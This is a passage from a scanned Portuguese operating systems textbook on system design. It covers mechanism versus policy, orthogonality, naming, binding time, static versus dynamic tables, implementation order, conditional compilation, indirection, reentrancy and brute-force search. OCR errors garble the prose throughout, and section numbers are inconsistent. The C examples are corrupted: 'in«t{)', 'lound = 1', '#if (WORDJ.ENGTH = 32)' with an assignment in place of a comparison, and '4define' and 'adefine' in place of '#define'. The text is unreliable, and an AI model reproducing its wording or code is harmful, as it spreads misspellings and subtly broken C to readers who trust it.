dos eom companhias de cartao dc credito c assim por dian- 
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te. A politica e ajustada pelo chefe de cozinha — o u seja, 
aquilo que esta no menu, Se o cliefe de cozinha decide que 
tofu esta fora e gran des files sao o maximo, essa nova poli¬ 
tica pode ser tratada pelo mecanismo existente, 

Vamos agora considerar alguns exemplos de sistemas 
operacionais, Primeiro, o escalonamento de threads. O nu¬ 
cleo pode ter um escalonador de prioridade, eom &niveis de 
prioridades. Como no UNIX e no Windows Vista, o meca¬ 
nismo e um veLor, indexado polo nfvd de prioridade. Cada 
entrada e a cabeęa de u ma lista de threads prontos naąuele 
nivel de prioridade. O escalonador simplesmente percorre 
o vetor da inaior prioridade para o dc rnenor prioridade, 
selecionando os primeiros threads que ele encomra. A po¬ 
litica e a configuraęao das prioridades. O sistema pode ter 
diferentes dasses de usuarios, cada u ma com uma priori¬ 
dade diferente, por exemplo. Ele ainda pode permitir que 
os processos do usuario ajustein as prioridades relativas de 
sens threads. As prioridades podem ser aumentadas após a 
conclusao de E^S ou dirninuidas após o uso de um quan- 
tum dc tempo, Existem inumeras out ras politicas possfycis, 
mas a ideia e most i ar a separaęao entre o estabelecimento 
da politica e a execuęao dela. 

Um segundo exemplo e o da paginaęao* O mecanismo 
envclve o gerenriamento de jMMU, mantendo listas de pa¬ 
ginas ocupadas e paginas iivres, e códigos para Lransferir as 
paginas entre a memória e o disco, A politica decide o que 
fazer quando ocorre uma falta de pagina. Ela pode ser local 
ou global, baseada em LRU ou RFO ou em algum outro lipo, 
mas esse algoritmo pode (e deve) ser eompletamente sepa- 
rado dos mecanismos dc gerenriamento real das paginas. 

Um terceiro cxemplo permite o carregamento dc mo¬ 
dliłoś para dentro do nucleo. O mecanismo se preocupa 
com o modo como des sao inseridos e liga dos, quais cha¬ 
ma das sao capazes de realizar e quais chamadas podem ser 
feitas com eles. A politica determina quem tem a permissao 
para carregar um módulo dentro do nucleo e quais sao os 
módulos permitidos. Talvez somente o stiperusuario pos- 
sa carregar os módulos, mas pode ser que qualquer usua¬ 
rio possa carregar um módulo que tenha sido assinado de 
modo digital pela autoridade apropriada. 

13.3.51 Ortogonalidade 

Um bom projeto de sistema consiste em concdtos sę¬ 
pa rados que podem ser combinados independentemente. 
Por exemplo, em C, existem tipos de da dos primitivos que 
itiduem imeiros, caractcrcs e ntimeros cm ponto flutu- 
ante. Tambem ha mecanismos para combinar tipos de da- 
dos, indumdo vetores, estruturas e unioes, Essas ideias 
combinam de modo independentc, pennitindo vctores dc 
inteiros, vetores de caractcrcs, estruturas c membros dc 
imiao que sao ntimeros em ponto flmuanie etc. De falo, 
uma vez qtie um novo tipo de dados e definido, como um 
vetor de inteiros, ele pode ser usado como se fosse um 
tipo de dado primitivo — por exemplo, como um membro 
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de uma estru tura ou u ma uniao. A habilidade para com- 
binar conccitos separados indepcndcutemenie e cha mada 
de ortogonafidade — conseąjienda direta dos prindpios dc 
simplicidadc e complcuide. 

O conceito de ort ogona] i da de tambem ocorre em sis- 
lemas operacionais de maneira disfaręada. Urn cxemplo e 
a chamada de sistema clone do Linux, a qual cna urn novo 
thread. A chamada tern um mapa de bits como para metro, 
quc permite que o espaęo dc endereęamento, o dirctório dc 
irabalho, os descrilorcs dc arquivos c os sinais sejam com- 
partilhados ou copiados individualmenle. Se tu do e copia- 
do, temos um novo processo, o mesmo que fork. Se nada 
e copiado, um novo tbread e criado no processo atuaL No 
entanlo, tambem e possfvel criai indos intcrmediarios dc 
compartilhamento nao permitidos nos sistcmas UNIX tra- 
dicionais. Separando as varias caractensticas e toniąndo-as 
ortogonais, toma-se factfvd um controle mais apurado* 

Outro uso da ortogonalidade ć a separaęao do concei¬ 
to de processo do conceito dc tbread no Windows Visia. 
Um processo na o passa de um red pi e me para recursos. Um 
thread e urna entidade escalonavel Quando um processo 
recebe um identificador de outro processo, na o interessa 
quantos threads ele possa ter. Quando um thread e esca- 
lonado, nao imeressa a qual processo cle pertence. Hsses 
conccitos sao oriogonais. 

Nosso ultimo exemplo de ortogonalidade vem do 
UNIX, Nele, a criaęao dc processos e kita cm dois passos: 
iork seguido dc exec. A criaęao dc um novo espaęo de ende- 
reęamcnio c seu carrcgamento com urna nova i ma gem na 
memória sao aędes separadas, permu indo que out ras aędes 
possam ser realizadas ciurę das (como a manipulaęao dc 
descrilores de arquivos}. No Windows Vista, csses dois pas¬ 
sos na o podcm ser a parta dos, isto e, os conccitos dc criaęao 
dc um noYO espaęo de endereęamento e o preenchimento 
desse espaęo nic sao oriogonais, A seąuencia do Linux de 
clone mais exec e a ind a mais ortogonal, uma vcz quc e Kis¬ 
łem mais blocos de construęao dispomVcis com maior refi- 
namenio, Como regra, um pequeno nu mero de dementos 
onogonais que possam ser combinados de varias maneiras 
leva a urn sistema pequeno, simples e elegante. 

15.5*4 I Nomeacao 

Muitas das estru tu ras dc dados de longa duraęao usa- 
das por um sistema operarional tem algom lipo dc nonie 
ou identificador pdos quais das podcm ser referenda das, 
Exemplos óbvios sao nomes de usuarios, de arqtiivos, de 
dis posili vos, ideiitiiicadores de processos, e assim por dian¬ 
ie. O modo como esses nomes sao construfdose gerencia- 
dos e uma ąuestao importanie no projeto e na implemen- 
taęao do sistema. 

Os nomes projetados para pessoas sao constituidos de 
cadeias dc caracteres cm cod i go ASCII ou Unicode e ge- 
rai me nte sao hierarąuicos. Os caminhos de diretórios — 


/usrlastfhooksfnmlfdmp-ll, por exempIo — sao nitidamente 
hierarquicos, indicando uma serie de diretórios que devem 
ser percorridos a partir do di retorto-raiz. Os URLs tambem sao 
hierarąuicos, Por cmnplo, <tiwra vu.nli~astł> indica uma 
maąuina espeafica (www) em um de parta mento esped.fi co (<s) 
de uma universidade espedfica (rw) em um pais cspccifico 
(w/)* O segmento depois da barra aponta para um arquivo es- 
peafico na maąuina referenda da — nesse caso, por convcn- 
ęao, <wwwfmdex.himl> no dirctório pessoal de asL Notę quc 
os URLs (e os ęndereęos DNS em geral, incluindo endereęos 
de e mail) sao montados 'de tras para a frente\ inidalizando 
na base da arvore c subindo, diferentemente dos nomes de 
arquivos J os quais se inicializam no topo da arvore e descem. 
Ontra maneira dc obsen ar isso e verificar se a arvore c cscrita 
a partir do topo inidalizando na esąuerda e indó para a dircita 
ou inidando na direita e indo para a csąuerda, 

Muitas vezes a nomeaęao e feita cm dois nfveis: cxter- 
no e interno. Por exemplo, os arquivos sempre tem nomes 
como cadeias de caracteres para as pessoas usarem, Alern 
disso, quasc sempre cxiste um nome interno que o sistema 
usa. No UNIX # o nome real de um arquivo e scu nu mero 
de i -node; o nome ASO i nao e empregado interna me me. 
De falo, ele nao e imico, visto quc um arquivo pode ter va- 
rias ligaęóes para ele. O nome interno annlogo no Windows 
Vista e o indice do arquivo na MFT. A funęao do dirctório 
e fornecer o mapeamento entre o nome cxterno e o nome 
interno, como mostra a Figura 13.4. 

Em muitos casos (como o exemplo dos nomes de ar- 
quivos da do ameriormente), o nome interno e um inteiro 
sern sinal que serve como um indice para uma tabela do 
mlcleo. Outros exemplos dc nomes como mdtccs de tabelas 
sao os dcscritores de arquivos do UN1X c os maniputadores 
de objęłoś do Windows Vista, Notc que ncnhiim desses tem 
qua]qucr representaęao externa: sao estritamente para uso 
do sistema e dos processos em execuęao. Em geral, e uma 
boa ideia empregar fndices de tabelas para nomes transien- 
tes que sao perdidos ąuando o sistema e rcinicializado. 

Os sistcmas operacionais muitas vezes dao su porte a 
miiltiplos espaęos de nomes, tanio externos quanto intemos. 
Por exemplo, no Capi tu lo 11 vimos tres espaęos de nomes 
extemos suportados pelo Windows Vista: nomes de arąui- 
vos, nomes de objetos e nomes de registro (e existe tambem 
o espaęo dc nomes Diretório Ativo, que nao foi abordado). 
Alem disso, ha lnu me i os espaęos de nomes intemos que cm- 
pręga m intciros sem sinais — por cxcmplo, identificador es 
de objetos, entradas na MFT etc, Embora os nomes nos espa¬ 
ęos de nomes externos sejam todos forma dos por cadeias de 
caracteres cm Unicode, a procura por um nome de arquivo 
no registro nao vai funcionar, assim como tambem o uso de 
um mdke MFT na tabela de objetos, Em um bom projeto, e 
necessaria umaanalise consideravel para saber quantos espa¬ 
ęos dc nomes serao rcąucridos, qual sera a sintaxe de nomes 
para cada um, como eles serao diferendados, se existirao no¬ 
mes rdativos e absolutos e assim por dianie. 
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Normę externo: /usr/ast/books/mos2^Chap-12 

'-v-' 



Nome interno: 2 


Figura 13.4 Os dirBtórios sao usados para mapear nonrces externos em nomes internos. 


_ 13.3.51 Moraento de associaęao (binding 

time) 

Como vimos, os sistemas operacionais u sam varios ti- 
pos de nomes para referenciar os objetos. As vezcs o ma- 
peamento entre um nome e um objęto e iixo, mas outras 
vezes, na o. No segundo caso r pode ser importante saber o 
moment o em que o nome e ligado ao objęto. Em geral, a 
associaęao antecipada {earfy binding) e simples, mas nao 
flextvel r ao passo que a associaęao tardia {łatę binding) e 
mais complicada, embora muitas vezes seja mais lfexfvd. 

Para esclarecer o concdto de momento de associaęao, 
e interessante observar alguns casos do mumio real Um 
exemplo de associaęao antecipada e a pratica de certos co- 
legios de permitir que os pais matriculem seu bebe logo 
no memento do nascimento e paguem antecipadamenle 
sua educaęao* Quando o e stu da me chegar aos 18 a nos, as 
mensalidades estarao totalmente pagas, nao importando os 
yalores delas naąude momento* 

No processo de fabricaęao, as pcęas solicitadas antę- 
cipadamente c a manutcnęao do estoąue sao exemplos 
de associaęao antecipada* Em contraste, o processo de 
fabricaęao just-w-time requer que os fornecedores sejam 
capazes de fomecer as peęas imediatamente, sem a ne- 
cessidade de urna solicitaęao adiantada (um exemplo de 
associaęao tardia). 

As iinguagens de programaęao muitas vezes permi- 
tem muhiplos momentos de associaęao para as variaveis. 0 
compilador associa as vanavds globais a um endercęo vir- 
mai espeafko. Isso cxempliiica a associaęao antecipada* As 
variaveis locais a um procedimento e atribmdo um endere¬ 
ęo yirtual (na pilha), no momento em que o procedimento 
e cha mado — trata-se de urna associaęao intermedia ria. As 
variaveis armazenadas di na mi ca nieme na memória (aque- 
las alocadas por nmłłoc em C ou m w em Java) sao associa - 
das a endereęos virtuais somente no momento em que sao 
realmente utilizadas. Nesse caso, temos associaęao tardia. 

Ossistemas operacionais com freąuencia u sam a associa¬ 
ęao antecipada para a maioria das estniluras de dados, mas 


ocasionalincnte empregam a associaęao tardia por quest6es 
de flexibilidade. A alocaęao de memória e um exemplo dts- 
so. Os primeiros sistemas multiprogramados em maąuinas 
que nao tinham hardware para a rcalocaęao de endereęos 
precisavam carrcgar um programa em algum endercęo de 
memória, realocando-o para quc pudesse ser cxccutado ali. 
Se o program a fosse levado para o disco, de leria de ser trazi- 
do de volta para o mesmo endereęo de memória, senao ca li¬ 
sa ria erros. Em eon tras te, a memória virtnal paginada e urna 
forma de associaęao tardia. O endereęo fisi co real correspom 
dente a um dado endercęo yirtual nao c conhecido atc quc a 
p agi na seja tocada e trazida de lato para a memória. 

Outro exemplo de associaęao tardia c a colocaęao de 
janelas em urna GUI* Ao contrario do que ocorria com os 
primeiros sistemas graficos, em que o program a do r era 
obrlgado a especilicar a coordenada absoluta da tda para 
cada imagem, nas GUis modernas o software usa coorde- 
nadas relativas a origem da janela, que nao e deterininada 
atc quc esta seja colocada na tda, c pode ainda ser trocada 
posteriormente. 

_ 13.3.61 Estruturas estaticas versus 

dinamicas 

Os projetistas de sistemas operacionais sao constante- 
mentc foręados a cscoihcr entre estruturas de dados esta¬ 
ticas e dinamicas. As estaticas sao semprc mais simpks de 
compreender, mais faceis de programar e mais rapidas 
dc usar; as dinamicas, por sua vez, sao mais Hexiveis* Um 
excmp1o óbvio e a tabela de processos* Os primeiros siste- 
mas simplesmente aIocavam um vetor fixo de estruturas 
por processo, Se a tabela de processos tivesse 2S6 enlra- 
das, eutao somente 256 processos poderiam existir em um 
mesmo instante. Urna tentativa de criar o 257“ processo 
cpusaria u ma fol ha cm razao da falta de espaęo na tabela, 
Estraićgias similares cram empregadas nas La bel as de ar- 
quivos abertos (por usuario e para o sistema todo) e nas 
muitas outras tabdas do nucleo. 
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Uma estrategia aliernatWa e construir a tabela de pro¬ 
cessos como uma lista encadeada de minitabelas, inidando 
com uma unica. Se essa tabela saturar, outra sera alocada 
de urn conjunto global e encadeada com a primeira. Desse 
modo, a tabela de processos nao ficara chcia, a menos que 
loda a memória do nucleo seja utilizada. 

Por outro lado, o eódigo para pesąuisar a tabela tor na- 
-sc mais cornplicado. Por excmplo, observe o eódigo para 
pesąuisar urna tabela de processos estatiea e encontrar urn 
dado PID, pid, mostrado na Figura 13,5* £ simpies e eficien- 
tc + Fazer a mesma larefa usando urna lista encadeada de 
minitabelas e mais trabalhoso. 

As tabelas estaticas sao meihorcs ąuando existe uma 
grandę ąuantidade de memória ou ąuando a ulilizaęao 
das tabelas pode ser estipulada com bastante precisao* Por 
exemplo f em um sistema mono u su ario, c improvavd quc 
o u su ario tente inicializar mais do que 64 processos de 
uma só vcz, c nao sera um desastre se uma lenta li va de 
inicializar um 65 u [alhar. 

Outra altemativa e usar uma tabela dc tamanho fixo, 
quc, ąuando satitra uma nova tabela de tamanho fixo, pode 
ser alocada, digamos, com o dobro do tamanho. As entra- 
das antais sao, entao, copiadas para a nova tabela e a ta¬ 
bela a miga e devolvida para a memória disponwel. Desse 
modo, a tabela e sempre contfgua em vez de encadeada. A 
desvamagem, nesse caso, e a necessidade de algum geren- 
damento de memória, e o endereęo da tabela e, agora, unia 
variavd em vez de uma constante. 

Uma ąuesLao similar se aplica as pilhas do nucleo. 
Quando um thread esta exeattando no modo nucleo ou 
chaveia para esse modo, de precisa de uma pil ha no es- 
paęo do nucleo, Para os threads do usuario, a pitba pode 
ser inkializada para executar a partir do topo do espaęo 
de endereęamento virtual de modo que o tamanho ne- 
cesśario nao precise ser especificado antecipadamente, Para 
os threads do nucleo, o tamanho tem de ser especificado 
a ni odpadanie nie, pois a pilha consome algum espaęo de 
endereęamento virtual do nucleo c pode havcr muitas pi¬ 
lhas, A ąuestao e: quanto espaęo cada thread deve obter? A 
ponderaęao, nesse caso, e similar a da tabela de processos* 
Outra ponderaęao estatico-dina niica e o esca łona men* 
to dc processos. Em alguns sistemas, cspcdalmcntc os dc 
tempo real, o cscalonamenlo pode ser fcito estaticamente 
dc mancira antecipada* Porexeniplo, uma linhaaerea snbe 
quais os horarios em que sens voos parlirao semanas antes 

found = 0; 

for (p = &proc_tabl e[0]; p < &proc_table[PRQC_TABLE_SIZEJ; p++) { 
if (p->proc_pid == pid) { 
lound = 1; 
break; 

} 

) 

Figura t3.5 Código para a pesquisa na tabela de processos 
para um dado PID. 


das partidas propriamente diias. De imneira semelhante, 
os sistemas multinridia sabem q tum do escalonar audio, vi- 
deo c outros processos de modo antecipado. Para uso de 
propósito geral, cssas consideraęoes nao prevalecem e o es- 
calonamento dcvc ser dinamico, 

Ainda uma outra ąuestao estatico-dina mica e a estru- 
tura do nucleo* 6 mtiito mais simpies ąuando o nucleo e 
constmfdo como um unico programa binario e earregado 
na memória para exectięao. A conseąuencia desse proje- 
to, comudo, e que a adlęao de novos dispositivos de E/S 
reąuer uma religaęao do nucleo com os novos drivers dos 
dispositivos. As primdras versoes do UNIX trabaIhavam 
assim, algo toialmente saiisfatório em um ambierne de mi- 
nieomputador ąuando a adięao de novos disposiiivos de 
E/S era uma ocorrenria rara. Atualmente, a maioria dos 
sistemas operacionais permite que um eódigo seja dinami- 
camenie adicionado ao nucleo, com toda a complexidade 
extra que isso exige, 

15.3.71 Implementaęao de dma para baixo 
versus de baixo para dma 

Embora seja rnelhor projetar o sistema no esiilo de 
dma para baixo, teoricanieme dc pode ser implementa- 
do tanio no estilo de ci ma para baixo quanlo no de baixo 
para ci ma* Em uma implementaęao de dma para baixo, os 
implementadores inicializam com os tratadores de cha ma- 
das de sistema e observam quais mecanismos e estru tu ras 
de da dos sao neeessarios para que eles funcionem. Esses 
procedimentos sao escritos e a descida prossegue ate que o 
hardware seja alcanęado. 

O problem a com essa abordagem e quc fica difidl 
teslar o sistema todo somente com os procedimentos dis- 
ponfveis no topo* Por essa razao, muitos deseńvolvedo- 
res acham mais pratico realnienie construir o sistema no 
estilo de baixo para dma. Essa pratica exige primeiro a 
escrita do eódigo que esconde o hardware de baixo mvel, 
essencialniente a HAL na Figura 11.2. O tratamento de 
interrupęao e o driver do relógio tanibem sao necessarios 
antedpadamente. 

A multiprogramaęao pode ser resolvida com um es- 
calonador simpies (por exemplo, escalonamento circular)* 
A partir de entao, deve ser posswe! testar o sistema para 
averiguar se ele pode executar multiplos processos correta- 
mente. Se o sistema fund on ar, e o momento de comeęar a 
definięao cuidadosa das varias tabelas e estru tu ras dc dados 
nccessarias emtodo o sistema, espedalmcnte aquclas para 
o gercnciamento dc processos e threads c tanibem para o 
gercnciamento dc memória. A E/S e o sistema de arqui- 
vos podern, de i nici o, esperar, exceto aqudas primitivas 
simpies usadas para testes e depuraęao, como ldtura do 
tedado e escrita no vfdeo* Em alguns casos, as estruturas 
de dados principais de baixo nivel devem ser protegidas, 
permitindo-se o acesso a elas somente por rneio de proce- 
dimentos especfficos de acesso — conseąuentemente, por 
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intermedia de programami o orientada a objetos, nao im- 
portando qual seja a linguagem de programaęao. Quando 
as camadas inferiores estiverem completas, elas poderao 
ser testadas totalmente. Dessc modo, o sislema avanęa de 
baixo para dnia, como se constroem os grandcs cdiffdos. 

Se existe u ma grandę equipe, urna abordagem alter- 
nativa consiste em primeiro lazer nm projeto detalhado do 
sistema lado e, depois, atribuir a diferentes grupos a escrita 
de diferentes módidos. Cada grupo testa sen próprio traba- 
lho de maneira isolada. Ouando todas as partes estiverem 
prontas, elas serao, entno, Integra da s e tesiadas, O proble- 
ma com cssa linha de iiwestida c quc, se tiada fimdonar 
inidahncme, pode ser diffeit isolar nm on mais módulos 
que estao com funrionamento dc fi cienie ou isolar urn gru¬ 
po que tenba se enganado sobrc aquilo que determiilado 
módulo deveria fazer, Comudo, com grandes eqtnpes, essa 
pratiea muitas vezes e usada para maximizara quantidade 
de paralelismo d u ramę o trabalho de programaęao. 

133 .81 Tecnicas uteis 

Acabamos de analisar algumas ideias abstratas para o 
projeto e a implemcruaęao de sisicmas. Agora examma- 
rernos tecnicas concretas uteis para a impiementaęao de 
sistemas. Existem inumeras outras, obviamente, mas a 1i- 
mitaęao de espaęo iaz com que nos aienliamos a semenie 
algumas delas. 

Escondendo o hardware 

O hardware possui muitas panes complicadas, que 
devem ser escondidas o quamo ames (a menos que ex- 
ponham poder computadonal, o que nao ocorre na maior 
parie do hardware). Alguns dos detalhes de muito baixo 
nivel podem ser escondidos por urna ca ma da do tipo HAL, 
mostrada na Figura 13.2. No entanto, muitos detalhes do 
hardware nao podem ser ocultados assim. 

Algo que merece atenęao des de o infcio e como trata r 
as interrupęoes. Elas iornani a programaęao desagradavel, 
mas os sistemas operacionais devem trata-las. Urna soluęao 
e transformatas de imediato em outra coisa. Por exem- 
plo, cada interrupęao pode ser transformada em um thread 
pop-tip instant a neamente. Nessc ponto, estaremos tratan- 
do com threads, cm vcz de interrupęoes. 

Urna segunda abordagem e converter cada inierrup- 
ęao em urna operaęao unlock sobre um mutex que o driver 
correspondente esliver esperando. Emao, o unico efeilo de 
urna interrupęao sera o de tornar algum thread promo, 

Uma terceira estra legia e converter uma interrupęao 
em u ma mensagem para algum thread. O código de baixo 
nrvd simplesmenie deve construir uma mensagein dizetido 
de on de vem a imerrupęao, coloca-la na fila e chamar o es- 
calonador para (potencialmeme) executar o tratador—que 
provavelmeme estava bloqueado esperando pela mensa - 
gem, Todas essas tecnicas e outras semelhantes rentam 
converter imerrupęoes em operaęóes de sineronizaęao 
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de threads. Fazer com que cada interrupęao seja iratada 
por um thread apropriado em um contexto igualmente 
apropriado e mais facil de gerenciar do que execntar um 
tratador em um comexto arbiirario que ocorre por acaso, 
Obviamente, isso dcve ser feito de modo efkiente, mas, 
nas profundezas do sistema opcracional, tudo deve ser 
feito efidentemente. 

A maioria dos sistemas operacionais e projetada para 
executar em multiplas plataformas de hardware. Essas pia¬ 
ta formas podem ser diferentes cm termos de chip de CPU, 
MMU, tamanho dc palavra, tamanho da KAM e outras ca¬ 
ra clcnsticas que nao podem ser facil nieme mascaradas pclo 
HAL ou equivalente. Todavia, c allamenlc desejavel ter um 
conjunto unico de arquivos-fonie que possani ser usadas para 
gerar todas as versoes; caso contrario, cada erro que aparecer 
posteriormente deve ser corrigido multiplas vezes em dwersos 
arquivos-fontes, com o risco de ficarem diferentes. 

Algumas variaęóes no hardware — como o tamanho 
da RAM — podem ser tratadas pelo sistema operacional, 
que devc determinar o valor no memento da imdalizaęao e 
armazena-lo em urna variavel. Os alocadores de memória, 
por exemplo, podem usar a variavel que eon te m o tama¬ 
nho da RAM para determinar qual sera o tamanho da ca- 
che de blocos r das tabelas de paginas etc, Mesmo as tabelas 
estaticas, como a de processos, sao passwds de ser medidas 
com base no total de memória disponweL 

Contudo, outras diferenęas, como diferentes chips de 
CPU, nao podem ser resolvidas a pa i tir de um unico có¬ 
digo binario que determine em tempo de exccuęao qual 
CPU esta executando. Unia maneira de atacaro próbie ma 
de uma origem e multiplos alvos e o emprego da com- 
pilaęao condicional. Nos arqtiivos-fonie, alguns flags sao 
definidos em tempo dc compiiaęao para as diferentes con¬ 
figu ra ęoes, que, por sua vez, sao usadas para agrupar os 
códigos dependentes de CPU, do tamanho da palavra, da 
MMU etc. Por exemplo, imagine um sistema operacional 
que deva ser executado nos chips Pentium ou UltraSPARC, 
que precisam de códigos de inicializaęao diferentes. O pro- 
eed imento mit poderia ser escrito como mostra a Figura 
13.6(3), Dependendo do valor de CPU , que e definido no 
arquivo cabeęalho config.h, um tipo ou outro de inicializa- 
ęao e feito. Como o binario real eoniem somente o código 
necessario para a maquina-a!vo, nao existe perda de efirien- 
cia nessc caso. 

Como urn segundo exemplo H suponha qne exista a ne- 
ccssidade de um tipo de da do Register, que deve ser de 32 bits 
para o Pentium e dc 64 bits para o UltraSPARC. Essc caso 
pode ser tratado pclo código condicional da Figura I3.6(b) 
(presumindo que o compilador prądu za imeiros de 32 bits 
e imeiros iongos de ó4 bits). Uma vez que essa definięao 
teiiha sido feita (provavelmente em um arquivo-cabeęallio 
indufdo em toda parte), o programador pode simpiesmen- 
te dęciarar as variaveis como sendo do tipo Register e, com 
isso, saber que elas terao o tamanho correto. 
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#include "CGnfig.h" 
in«t{) 

{ 

#if (CPU == PENTIUM) 
r Pentium initiaiiiation here, 7 
#endif 

#if (CPU == ULTRASPARC) 

/* UltraSPARC initialization here. 7 

#endif 

) 

(a) 

K Figura 13.6 (a) CompilaęcLO condiciooai dependenta de U 


#include “ eon fig. h" 

#if (WORDJ.ENGTH = 32) 
typedef int Register; 

#endit 

#if (WORD_LENGTH == 64) 
typedef long Register; 

#endif 

Register RG, R1, R2, R3; 

(b) 

J . (b) CompitaęSo condicional dependent© do tamanho da paiavra. 


Gbviamenie, o arquivo-cabeęalho, confy h, Lem de ser 
definido carretamente, Para o Pentium dc pode ser algo 
do lipo; 

#define CPU PENTIUM 

4define WORD^LENGTH 32 

Para compilar o sislema para o UliraSPARC, um config.h 
diler en te deve ser usado, com os valores corretos para o 
UltraSPARC — provavelmente algo do tipo: 

adefine CPU ULTRASPARC 

#ctefin© WORD.LENGTH 64 

Alguns Icitorcs podem quercr saber por que CPU e 
WORD_LENGTH sao manipuladaspor macros diferentes. Po¬ 
de na mos faeil menie ter a grupa do a dclmięao de Register com 
mu tesle sobre a CPU, ajnstando seu tamanho para 32 biis 
para o Pentium e 64 biłs para o UltraSPARC. No en tamo, 
essa nao e uma boa soluęao. Considere o que ocorre quando 
postenormente transportamos o sislema para o llanium 64 
bits da Intel. Seria preciso adirionar uma terceira condido- 
nal a Figura 13.ó(b) para o Itanium* Fazcndo da mancira 
como temos feito, torna-se neccssario apenas induir a lin ha 

ffdefine WORDLENGTH 64 

ao arquivo config.h para o Itanium, 

Esse exemplo ilustra o prmcfpio da ortogonalidade dis- 
cutido anteriomiente. Os iiens dependent es da CPU devem 
ser compHados condicionalmenie com base na macro CPU, 
e tu do o que e dependente do tamanho da palavra dcve 
usar a macro WQRD_LENGTH. Consideraęoes similarcs sao 
fcitas paro niuiios outros parametros. 

Indireęao 

Muitas vezes ouvimos dizer que nao existe probiema 
em cicncia da computaęao que nao possa ser resolvido com 
um outro nfvel dc indireęao. Embora essa asseręao seja um 
pouco exagerada, ha algo de vcrdadeiro ncla. Yamos consi- 
derar alguns exemplos, Em sistemas bascados no Pentium, 
quando uma teda e pressionada, o hardware gera uma in- 
terrupęao e coloca o mimem da teda — em vez do código 
ASCII do carariere — em um registrador do disposiiiYO. 


Alem disso, quando a teda e liberada posteriormente, gera- 
-se uma segunda interrupęap, tambem com o nu mero da 
teda. Essa indireęao permitc quc o sistema operacional usc 
o mi mero da teda para indexar uma tabela c obter o ca rac¬ 
ic rc ASCII, toniąndo faril tratar os diferentes teclados usa- 
dos no mu ndo todo em diferentes paises, Com a obtenęao 
das informaędes de pressionameruo e liberaęao de teclas, e 
posswel usar qualquer teda como uma teda shift, visto que 
o sislema operacional sabe a sequcncia cxata em que as 
tedas (oram pressionadas e liberadas. 

A indireęao tambem ć empregada na salda dos dados. 
Os programas podem cscrever caracteres ASCII na ida, 
mas esses caracteres sao imerpremdos como fndłces em 
urna tabela para a fonte de salda utilizada. A entrada na ta¬ 
bela conteni o mapa de bits para o caractere. Essa indireęao 
possibilita separar os caracteres das font es. 

Outro cxemplo de indireęao e o uso dos mimeros prin- 
cipais do dispositivo (major dmce mrnhers) no UNTX. Den¬ 
im do mideo existc utną tabela indexada pdo nu mero do 
disposilivo prtncipal para os disposilwos de blocos e um 
outro para os dispositivos dc caracteres. Quando um pro- 
cesso abre um arquivo espccial, como fdev/hdQ , o sislema 
cxtrai do i-node o lipo (bloco ou caractere) e os mimeros 
Principal e secundario do dispositivo e os indexa cm uma 
tabela dc driver apropdada para encomrar o driver, Essa 
indireęao facitita □ recoiifiguraęao do sistema, pois os pro- 
gra mas lidarn com nomes simbólicos de dispositivos e nao 
com nomes rcais do driver. 

Ainda um outro esemplo de indireęao ocorre nos sis- 
temas baseados cni trocas dc mensagens que u sam como 
deslinatado da mensagern uma caixa postał em vez de urn 
proccsso. Ernpregando a indireęao por meio de caixas pos¬ 
ła is (em vcz de nomcar um processo como desiinaiario), 
obtem-se uma IleKibilidade consideravd (por exetnplo, ter 
uma secreiaria para lidarconi as mensagens de seu didc). 

Nesse sentido, o uso de macros, como 

#detine PROC_TABLE_SIZE 256 

tambem e unia forma de indireęao, visto que o prograrna- 
dor pode escrever código sem precisar saber o tamanho que 
a tabela realmente tem. Ć uma boa pratica atribuir nomes 
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sunbólicos para todas as constantes (exceto em alguns ca- 
sos, como *-l, 0 e 1) e coloca-los nos cabeęalhos com co- 
meniarios explkando para que servem. 

Reusabilidade 

Frequentcmenie e possfvd remilizar o mesmo códi- 
go om contextos iigeiramente diferentes. E isso e uma boa 
ideia, uma vcz qne reduz o lamanho do código binario e 
signifka que o código tcm de ser depurado somcnte uma 
vez. Por exemplo, suponha que ma pas de bils sejam em- 
pregados para gnardar informaęao dos blocos livres de nm 
disco, O gerendamento de blocos do disco pode ser tratado 
por rotinas aihc e/rcc que gerendem os mapas de bits. 

Como uma soluęao minima, essas rotinas devem fum 
cionarpara qualqiierdisco. Masę possiye! fazcr mdhorque 
isso. As mesmas rotinas tambem podem funcionar para o 
gerendamento de blocos da mcmória, de blocos na cache 
de blocos do sistema de arquivos e dos i-nodes, Na verdade, 
clas podcm ser usadas para alocar e desalocar quaisquer 
recursos passfreis de ser lincarmcme enumcrados, 

Reentrancia 

A reentrancia se caracteriza pela possibilidadc dc o 
código ser executado duas on mais yczcs si multa nea me li¬ 
te. Em urn multiprocessador, existe sempre o perigo de 
que, enquanto uma CPU execula alguma mii na, outra 
CPU inicialize a execuę*io da mesma rotina tambem, an- 
tes que a primeira ten ha acabado. Nesse easo, dois (ou 
mais) threads em diferentes CPUs podem estar executan- 
do o mesmo código ao mesmo tempo. Essa situaęao deve 
ser evitada usando mutexes ou outros mecanismos que 
protejam rcgioes crfticas. 

No entanto, o problema tambem existe em urn mono- 
proeessadon Em particular, a maior parte de qualquer sis¬ 
tema opera ci on al irabalba com as imerrupęoes habilitadas. 
Para irabalbar de outro modo, muitas intermpęóes seriam 
perdidas e o sistema nao se mostraria confiavel. Enquanto 
o sistema operacional esta ocupado executando alguma ro¬ 
tina, P f e totalmenie possfvel que uma interrupęao ocorra 
e quc o tratador dc interrupęao tambem chanie P. Sc as 
estru tu ras de dados de P cstivercm em um esrado inconsis- 
tente no momcnto da interrupęao, o tratador falhara. 

Um outro caso claro dessa ocorre ncia e se P for o es- 
calonador. Suponha que algum processo ten ha usado seu 
ąuantum e o sistema operacional o ten ha movido para o 
finał de sua fila. Enquanto o sistema rcaliza a mampula- 
ęao da Usta, a interrupęao ocorre, tornando algum processo 
pronto, c, com isso, o cscalonador c cxccutado. Com as fi las 
cm um estado de inconsistencia, o sistema provavclmcntc 
travar£ Como consequencia, mesmo cm um monoproces- 
sador, e melhor que a maior parte do sistema operacional 
seja reentrante, com esmuuras de dados erilicas protegidas 
por mmexes e as interrupędes sen do desabilitadas nos mo- 
mentos em que nao puderem ser toleradas. 
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Forca bruta 

O uso de foręa bruta para resolver próbie mas nao tern 
sido bem visto nos ultimos a nos, mas e muitas vezes a me- 
ihor opęao em nome da simplicidade. Todo sistema opera- 
cional tern muitas rotinas que sao raramente chamadas ou 
operatu com tao poucos dados que sua otńnizaęao nao vale 
a pena. Por excmplo, frequentemente e nccessario pesquisar 
varias tabclas c vetorcs dentro do sistema. O algoritmo foręa 
bruta simplesmcnte mantem as entradas da tabela na mes- 
ma ordem cni quc estavam e a pcsąuisa linearmente qtian- 
